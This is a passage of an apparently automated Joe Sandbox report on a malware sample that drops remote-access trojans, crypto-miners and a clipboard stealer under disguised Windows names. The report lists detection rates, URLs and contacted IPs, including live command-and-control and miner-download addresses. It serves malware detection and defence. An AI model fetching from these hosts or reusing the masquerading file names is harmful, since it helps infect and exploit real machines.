                                  C:\Users\user\Desktop\IZEltFrY.log5%ReversingLabs
                                  C:\Users\user\Desktop\KbrUPpvT.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\OIKLmzcP.log25%ReversingLabs
                                  C:\Users\user\Desktop\OShKWlwM.log17%ReversingLabs
                                  C:\Users\user\Desktop\QLwtIihK.log25%ReversingLabs
                                  C:\Users\user\Desktop\UBnkPfhE.log12%ReversingLabs
                                  C:\Users\user\Desktop\UtDRkwHy.log4%ReversingLabs
                                  C:\Users\user\Desktop\bjHzibbh.log8%ReversingLabs
                                  C:\Users\user\Desktop\brrRNKBn.log25%ReversingLabs
                                  C:\Users\user\Desktop\fZypqYbb.log21%ReversingLabs
                                  C:\Users\user\Desktop\hbkYLHfW.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Users\user\Desktop\mFfXERcN.log29%ReversingLabsWin32.Trojan.Generic
                                  C:\Users\user\Desktop\quigFLkP.log21%ReversingLabs
                                  C:\Users\user\Desktop\sPPOvTaE.log29%ReversingLabs
                                  C:\Users\user\Desktop\syIwhxhC.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\tvjECxvw.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\vrXfSuSA.log16%ReversingLabs
                                  C:\Windows\Bridgeprovider.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Windows\INF\MicrosoftDefenger.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Windows\Tasks\1.exe63%ReversingLabsByteCode-MSIL.Trojan.Uztuby
                                  C:\Windows\Tasks\ApplicationsFrameHost.exe62%ReversingLabsWin64.Trojan.Miner
                                  C:\Windows\Tasks\IntelConfigService.exe56%ReversingLabsWin64.Trojan.AitMiner
                                  C:\Windows\Tasks\MSTask.exe54%ReversingLabsWin64.Trojan.Malgent
                                  C:\Windows\Tasks\MicrosoftPrt.exe39%ReversingLabsWin64.Infostealer.ClipBanker
                                  C:\Windows\Tasks\Superfetch.exe68%ReversingLabsWin64.Trojan.Malxmr
                                  C:\Windows\Tasks\WinRing0x64.sys5%ReversingLabs
                                  C:\Windows\Tasks\Wmiic.exe74%ReversingLabsWin64.Trojan.Skeeyah
                                  C:\Windows\Tasks\Wrap.exe65%ReversingLabsWin64.Trojan.Generic
                                  C:\Windows\Temp\_MEI81722\VCRUNTIME140.dll0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\_bz2.pyd0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\_cffi_backend.cp38-win_amd64.pyd0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\_ctypes.pyd0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\_hashlib.pyd0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\_lzma.pyd0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\_queue.pyd0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\_socket.pyd0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\_ssl.pyd0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\libcrypto-1_1.dll0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\libffi-7.dll0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\libssl-1_1.dll0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\psutil\_psutil_windows.pyd0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\python3.dll0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\python38.dll0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\select.pyd0%ReversingLabs
                                  C:\Windows\Temp\_MEI81722\unicodedata.pyd0%ReversingLabs

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  SourceDetectionScannerLabelLink
                                  http://crl.mic0%Avira URL Cloudsafe
                                  http://185.17.0.139:8081/client/setClientConfig?clientId=1244060%Avira URL Cloudsafe
                                  https://github.co80%Avira URL Cloudsafe
                                  http://crl.micB0%Avira URL Cloudsafe
                                  http://45.137.64.40/miners/v.txt0%Avira URL Cloudsafe
                                  http://45.137.64.40/miners/miners.txt0%Avira URL Cloudsafe
                                  http://45.137.64.40/miners/v.txt_inspect.py?0%Avira URL Cloudsafe
                                  http://185.17.0.139:8081/client/setClientStatus?clientId=1244060%Avira URL Cloudsafe
                                  http://45.137.64.40/miners/miners.txtz0%Avira URL Cloudsafe
                                  http://json.org0%Avira URL Cloudsafe
                                  http://45.137.64.40/miners/miners.txtindex0%Avira URL Cloudsafe
                                  http://greenbytes.de/tech/tc2231/0%Avira URL Cloudsafe
                                  https://cryptography.io0%Avira URL Cloudsafe

                                  Domains and IPs

                                  Contacted Domains

                                  No contacted domains info

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://185.17.0.139:8081/client/setClientConfig?clientId=124406true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://185.17.0.139:8081/client/setClientStatus?clientId=124406true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://45.137.64.40/miners/v.txtfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://google.com/MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://mahler:8092/site-updates.pyMSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1CC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://urllib3.readthedocs.io/en/stable/v2-migration-guide.htmlMSTask.exe, 0000003E.00000002.4151510423.00000268D1EE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/giampaolo/psutil/issues/875.MSTask.exe, 0000003E.00000002.4150391984.00000268D1AA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          http://.../back.jpegMSTask.exe, 0000003E.00000002.4151834766.00000268D2050000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://cloud.google.com/appengine/docs/standard/runtimesMSTask.exe, 0000003E.00000002.4151443278.00000268D1E90000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/pyca/cryptographyMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://cryptography.io/MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxyMSTask.exe, 0000003E.00000002.4151313174.00000268D1E10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.python.org/MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1CC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://httpbin.org/postMSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/pyca/cryptography/MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/Ousret/charset_normalizerMSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.com/urllib3/urllib3/issues/497MSTask.exe, 0000003E.00000002.4151443278.00000268D1E90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://pypi.python.org/pypi/wget/MSTask.exe, 0000003E.00000002.4150608257.00000268D1D2A000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://bitbucket.org/techtonik/python-wget/MSTask.exe, 0000003E.00000002.4150608257.00000268D1D2A000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://bitbucket.org/techtonik/python-pagerMSTask.exe, 0000003E.00000002.4152185819.00000268D2550000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.python.org/download/releases/2.3/mro/.MSTask.exe, 0000003E.00000002.4149377598.00000268D17E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://github.com/pyca/cryptography/actions?query=workflow%3ACIMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/BenDr0id/xmrigCC/Wrap.exefalse
                                                                            		high
                                                                            http://45.137.64.40/miners/v.txt_inspect.py?MSTask.exe, 0000003E.00000002.4149243495.00000268D17A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://goo.gl/zeJZl.MSTask.exe, 0000003E.00000002.4150128342.00000268D19E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://tools.ietf.org/html/rfc2388#section-4.4MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.apache.org/licenses/LICENSE-2.0MSTask.exe, 00000038.00000003.1917495670.00000286A4AD1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1917367520.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1917413742.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://github.com/Bendr0id/xmrigCC/blob/master/doc/ALGORITHMS.md)ApplicationsFrameHost.exe, 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                    		high
                                                                                    http://yahoo.com/MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925792761.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925612181.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927960487.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.drfalse
                                                                                          		high
                                                                                          https://w3c.github.io/html/sec-forms.html#multipart-form-dataMSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://cryptography.io/en/latest/changelog/MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://45.137.64.40/miners/miners.txtzMSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://mail.python.org/mailman/listinfo/cryptography-devMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://requests.readthedocs.ioMSTask.exe, 0000003E.00000002.4151999223.00000268D2110000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://curl.haxx.se/rfc/cookie_spec.htmlMSTask.exe, 0000003E.00000002.4151888834.00000268D2090000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.python.org/dev/peps/pep-0205/MSTask.exe, 00000038.00000003.1916592166.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4151133313.00000268D1D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBridgeprovider.exe, 00000041.00000002.2009860535.0000000003C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://json.orgMSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688MSTask.exe, 0000003E.00000002.4148600389.00000268D1100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://httpbin.org/getMSTask.exe, 0000003E.00000002.4152185819.00000268D2550000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://httpbin.org/MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.python.orgMSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://ocsp.thawte.com0MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925792761.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925612181.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927960487.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.drfalse
                                                                                                                  		high
                                                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerMSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://crl.micMSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warningsMSTask.exe, 0000003E.00000002.4151313174.00000268D1E10000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4151258677.00000268D1DD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://mail.python.org/pipermail/python-dev/2012-June/120787.html.MSTask.exe, 0000003E.00000002.4150128342.00000268D19E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://httpbin.org/MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.apache.org/licenses/MSTask.exe, 00000038.00000003.1917413742.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://twitter.com/MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://stackoverflow.com/questions/4457745#4457745.MSTask.exe, 0000003E.00000002.4150391984.00000268D1AA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535MSTask.exe, 0000003E.00000002.4150608257.00000268D1C7D000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://cryptography.io/en/latest/installation/MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syMSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://github.co8MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        http://45.137.64.40/miners/miners.txtMSTask.exe, 0000003E.00000002.4149377598.00000268D17E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://img.shields.io/pypi/v/cryptography.svgMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://google.com/mail/MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://wwwsearch.sf.net/):MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://github.com/BenDr0id/xmrigCC/Dmigrate.exe, 0000001A.00000003.1846671612.00000000076C4000.00000004.00000020.00020000.00000000.sdmp, Wrap.exe, 0000002A.00000002.4147802066.00007FF726D2E000.00000002.00000001.01000000.0000000C.sdmp, ApplicationsFrameHost.exe, 00000035.00000000.1907411028.00007FF6A9D02000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://crl.micBMSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://tools.ietf.org/html/rfc6125#section-6.4.3MSTask.exe, 0000003E.00000002.4151510423.00000268D1EE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://cryptography.io/en/latest/security/MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.openssl.org/HMSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4153579722.00007FFDFB339000.00000002.00000001.01000000.0000001C.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://45.137.64.40/miners/miners.txtindexMSTask.exe, 0000003E.00000002.4149377598.00000268D17E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://greenbytes.de/tech/tc2231/MSTask.exe, 0000003E.00000002.4152185819.00000268D2550000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyMSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://cryptography.ioMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://github.com/pyca/cryptography/issuesMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://readthedocs.org/projects/cryptography/badge/?version=latestMSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://google.com/mailMSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://pypi.org/project/cryptography/MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high

                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                  Public IPs

                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  185.17.0.139
                                                                                                                                                                  		unknownRussian Federation
                                                                                                                                                                  		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                                  45.137.64.40
                                                                                                                                                                  		unknownNetherlands
                                                                                                                                                                  		204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLfalse

                                                                                                                                                                  General Information

                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                  Analysis ID:1571089
                                                                                                                                                                  Start date and time:2024-12-08 23:01:08 +01:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 13m 54s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                  Number of analysed new started processes analysed:69
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:IYXE4Uz61k.exe
                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                  Original Sample Name:0c1cb4cc583aabc07f0482f7e0767ecf.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal100.spre.troj.adwa.expl.evad.mine.winEXE@116/100@0/2
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 88.9%
                                                                                                                                                                  HCA Information:Failed
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                  Warnings

                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                  • Execution Graph export aborted for target MSTask.exe, PID 3272 because there are no executed function
                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
